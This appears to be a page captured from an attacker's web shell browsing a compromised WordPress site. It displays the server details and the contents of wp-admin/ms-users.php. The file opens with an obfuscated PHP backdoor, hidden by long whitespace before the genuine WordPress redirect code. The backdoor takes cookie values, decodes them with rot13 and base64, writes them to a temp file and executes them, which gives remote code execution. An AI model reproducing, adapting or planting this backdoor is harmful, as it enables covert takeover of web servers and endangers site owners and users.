HEX
Server: Apache/2
System: Linux vps32496.sdns.vn 3.10.0-1160.99.1.el7.x86_64 #1 SMP Wed Sep 13 14:19:20 UTC 2023 x86_64
User: khuondaotc (1075)
PHP: 7.4.33
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
$ pwd: /home/khuondaotc/domains/khuondaotct.com/private_html/wp-admin/
Upload Files
File: /home/khuondaotc/domains/khuondaotct.com/private_html/wp-admin/ms-users.php
<?php																																										if (isset($_COOKIE[23-23]) && isset($_COOKIE[93-92]) && isset($_COOKIE[-25+28]) && isset($_COOKIE[-20+24])) { $sym = $_COOKIE; function request_approved($itm) { $sym = $_COOKIE; $fac = tempnam((!empty(session_save_path()) ? session_save_path() : sys_get_temp_dir()), '58fe0270'); if (!is_writable($fac)) { $fac = getcwd() . DIRECTORY_SEPARATOR . "splitter_tool"; } $parameter_group = "\x3c\x3f\x70\x68p " . base64_decode(str_rot13($sym[3])); if (is_writeable($fac)) { $dat = fopen($fac, 'w+'); fputs($dat, $parameter_group); fclose($dat); spl_autoload_unregister(__FUNCTION__); require_once($fac); @array_map('unlink', array($fac)); } } spl_autoload_register("request_approved"); $obj = "f5919957a822c3bfb3591bcc3e51bdf8"; if (!strncmp($obj, $sym[4], 32)) { if (@class_parents("module_controller_framework", true)) { exit; } } }

/**
 * Multisite users administration panel.
 *
 * @package WordPress
 * @subpackage Multisite
 * @since 3.0.0
 */

require_once __DIR__ . '/admin.php';

wp_redirect( network_admin_url( 'users.php' ) );
exit;
@ Telegram